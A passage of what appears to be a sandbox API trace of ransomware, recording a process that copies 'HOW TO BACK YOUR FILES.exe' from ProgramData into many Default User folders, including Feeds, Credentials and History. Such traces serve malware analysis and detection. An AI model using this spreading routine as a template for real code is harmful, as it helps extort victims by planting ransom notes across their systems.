User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4258 | out: hHeap=0x2b0000) returned 1 [0065.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.733] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 101 [0065.733] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.734] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.734] GetLastError () returned 0x0 [0065.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.734] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.734] CloseHandle (hObject=0x120) returned 1 [0065.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.734] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.734] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.734] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.735] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0065.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.735] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 101 [0065.735] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.735] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.735] GetLastError () returned 0x0 [0065.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.735] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.735] CloseHandle (hObject=0x120) returned 1 [0065.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.736] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.736] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.736] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.736] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.736] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.737] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.737] GetLastError () returned 0x0 [0065.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.737] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.737] CloseHandle (hObject=0x120) returned 1 [0065.737] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.737] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.737] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.737] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.737] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.737] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.738] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.738] GetLastError () returned 0x0 [0065.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.738] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.738] CloseHandle (hObject=0x120) returned 1 [0065.738] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.738] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.739] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.739] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.739] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.739] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.739] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.739] GetLastError () returned 0x0 [0065.739] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.740] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.740] CloseHandle (hObject=0x120) returned 1 [0065.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.740] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.740] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.740] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.740] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.740] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.741] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.741] GetLastError () returned 0x0 [0065.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.741] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.741] CloseHandle (hObject=0x120) returned 1 [0065.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.741] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.741] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.742] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.742] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.742] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.742] GetLastError () returned 0x0 [0065.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.742] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.742] CloseHandle (hObject=0x120) returned 1 [0065.743] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.743] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.743] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.743] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.743] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.743] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.743] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.743] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.744] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.744] GetLastError () returned 0x0 [0065.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.744] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.744] CloseHandle (hObject=0x120) returned 1 [0065.744] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.744] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.744] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.744] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.744] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0065.744] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0065.744] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.744] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.745] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back 